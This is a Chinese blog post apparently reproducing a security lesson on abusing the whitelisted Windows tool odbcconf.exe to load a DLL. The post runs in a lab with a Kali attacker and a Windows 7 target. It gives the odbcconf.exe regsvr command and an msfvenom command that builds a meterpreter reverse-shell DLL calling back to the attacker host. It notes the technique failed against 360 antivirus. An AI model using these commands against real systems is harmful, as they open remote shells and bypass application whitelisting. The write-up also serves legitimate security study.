对亮神基于白名单odbcconf.exe执行payload第十二季复现

最新推荐文章于 2024-06-18 11:43:19 发布

原创最新推荐文章于 2024-06-18 11:43:19 发布 · 291 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#msf #白名单

亮神文章复现专栏收录该内容

19 篇文章

订阅专栏

博客介绍了ODBCCONF.exe命令行工具，可配置ODBC驱动程序和数据源。还进行了基于白名单Odbcconf执行payload的复现，给出攻击机（kali 192.168.5.102）和靶机（win7 192.168.5.101）环境，最后总结未能绕过360，并给出借鉴链接。

0x00 Odbcconf简介：

ODBCCONF.exe是一个命令行工具，允许配置ODBC驱动程序和数据源。

0x01 环境

攻击机 kali 192.168.5.102
靶机 win7 192.168.5.101
装有av

0x02复现

攻击机配置
在这里插入图片描述
靶机

odbcconf.exe /a {regsvr C:\Users\Administrator\Desktop\hacker.dll}

弹回
在这里插入图片描述

0x03 hacker.dll

msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.5.102 lport=4444 -f dll > hacker.dll

0x04 总结

不过360

0x05 借鉴

https://micro8.github.io/Micro8-HTML/Chapter1/81-90/82_基于白名单Odbcconf执行payload第十二季.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

cxk331

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

利用白名单应用绕过防护

Coisini的博客

06-13

1463

0x00 前言看了subTee的在ShmooCon2015的PPT，学习到了很多关于应用白名单绕过的技巧，今天又看见了subTee开始写博客了，并且详细解释了关于应用白名单绕过的方法，于是结合自己测试与大家分享一下。看完ppt其实作者是想告诉我们一种思想，我自己的理解是“利用信任程序执行恶意代码“。 0x01 脚本执行当在一些情况下，比如限制了.bat|.vbs|.ps1脚本执行，我们可以...

Windows上命令行实现运行时添加ODBC数据源-odbcconf命令的使用

seeallsea

06-29

1620

最近做的一个项目要求程序可以自动在windows上添加一个ODBC数据源，发现可以用Windows API中的SQLConfigDataSource函数可以实现，在查看MSDN文档时，这个函数等同于odbcconf.exe命令行工具。最好是使用SQLConfigDataSource自己实现一个application，用来创建ODBC数据源，但是使用odbcconf.exe命令行工具，然后...

参与评论您还未登录，请先登录后发表或查看评论

Windows系统缺失wpnapps.dll文件如何解决？

amio555的专栏

07-03

1765

其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题，如果是新手第一时间会认为是软件或游戏出错了，其实并不是这样，其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库，这时你可以下载这个wpnapps.dll文件(挑选合适的版本文件)把它放入到程序或系统目录中，当我们执行某一个.exe程序时，相应的DLL文件就会被调用，因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现wpnapps.dll丢失要怎么解决？

启动应用程序出现odbcconf.exe找不到问题解决

最新发布

wbcmbfy的博客

06-18

924

其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题，如果是新手第一时间会认为是软件或游戏出错了，其实并不是这样，其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库，这时你可以下载这个odbcconf.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中，当我们执行某一个.exe程序时，相应的DLL文件就会被调用，因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现odbcconf.exe丢失要怎么解决？

Win7系统提示找不到odbcconf.exe文件的解决办法

file

03-06

906

打开DOS环境，输入SC命令或注册odbc时，系统提示sc或odbcconf.exe不是内部或外部命令

长期专注于数字工厂规划、建设。对数字化、智能制造、自动化控制等领域有深刻的体会、感触

04-24

3228

在xp、你、win7下试图添加一项新服务，打开DOS环境，输入SC命令或注册odbc时，系统提示sc或odbcconf.exe不是内部或外部命令。解决方法如下：右击我的电脑，点击属性》高级》环境变量，在弹出的新窗口下的系统变量中找到Path，点击编辑，在变量值一行中添加 %SystemRoot%/system32;%SystemRoot%;%SystemRoot%/System32/Wbem

第八十二课：基于白名单Odbcconf执行payload第十二季.docx

09-15

在本课程中，我们探讨了如何利用白名单机制下的ODBCConf工具来执行Payload，特别是在互联网安全领域，这种技术常被APT（Advanced Persistent Threat）攻击者用来绕过防护措施。ODBCCONF.exe是一个用于配置ODBC驱动...

01-12

12-28

01-12

Windows7系统odbcconf.exe文件丢失问题

amio555的专栏

12-19

945

重新安装ODBC 驱动程序方法之一

飞鹰

12-16

4698

事实上，我们只需要用odbcconf.exe来重新注册一下ODBC Driver就可以了。在Windows/System32目录下有几个脚本文件，可以来完成驱动程序的注册： odbcconf.exe /S /Lv odbcconf.log /F %systemroot%\system32\mdaccore.rsp odbcconf.exe /S /Lv odbcconf.log /F %syst...

ODBC Driver的信息没有了怎么办

querystringcom的专栏

08-19

819

我们只需要用odbcconf.exe来重新注册一下ODBC Driver就可以了。在Windows/System32目录下有几个脚本文件，可以来完成驱动程序的注册： odbcconf.exe /S /Lv odbcconf.log /F %systemroot%\system32\mdaccore.rsp odbcconf.exe /S /Lv

应用白名单：方法与挑战

weixin_41783960的博客

03-26

2633

应用白名单：方法与挑战这是关于白名单的第二篇文章，对白名单的一些方法和面临的问题进行了一些分析，也是属于概念范畴。文章地址：https://www.researchgate.net/publication/235981426_APPLICATION_WHITELISTING_APPROACHES_AND_CHALLENGES 摘要对于企业网络、家庭电脑而言，恶意软件是一个一直存在的问题。即使...

[Microsoft][ODBC 驱动程序管理器] 未发现数据源解决方法！

Peyton的专栏

07-20

7529

在Windows Server 2003 上安装 MS SQL Server 2000 标准版时，出现“[Microsoft][ODBC 驱动程序管理器] 未发现数据源”，具体提示为：################################################

对亮神基于白名单Url.dll执行payload第十七季复现

cxk

05-06

408

0x00 Url.dll简介： url.dll是Internet快捷壳扩展相关应用程序接口系统文件。攻击机： 192.168.5.100 kali 靶机： 192.168.5.157 Windows 7

如何通过命令行方式配置ODBC数据源

一个大龄码农的专栏

11-08

1053

通过数据源GUI配置工具来配置数据源，想必对80%的软件开发人员难度不大，但是如何通过命令行方式来配置数据源，对大部分开发人员来讲比较新鲜。今天在这里介绍一下，如何通过命令行方式来配置ODBC数据源。　　通过命令行方式配置ODBC数据源的代码如下：　　odbcconf.exe/a{CONFIGSYSDSN"Firebird/InterBase(r)driver""DSN=db_...

mysql+odbc驱动+免安装_Mysql ODBC 5.1 Driver免安装脚本 | 学步园

weixin_39901571的博客

01-18

443

在使用Mysql 的时候，需要使用ODBC数据源的方式来连接mysql，所以常常需要用到免安装的驱动，自己参考官网的脚本，修改了一个实用点的脚本，放出来大家一起分享：安装mysql odbc 5.1 Driver@ECHO OFFSET installdir=noneIF EXIST %windir%/system/nul SET installdir=%windir%/systemIF EX...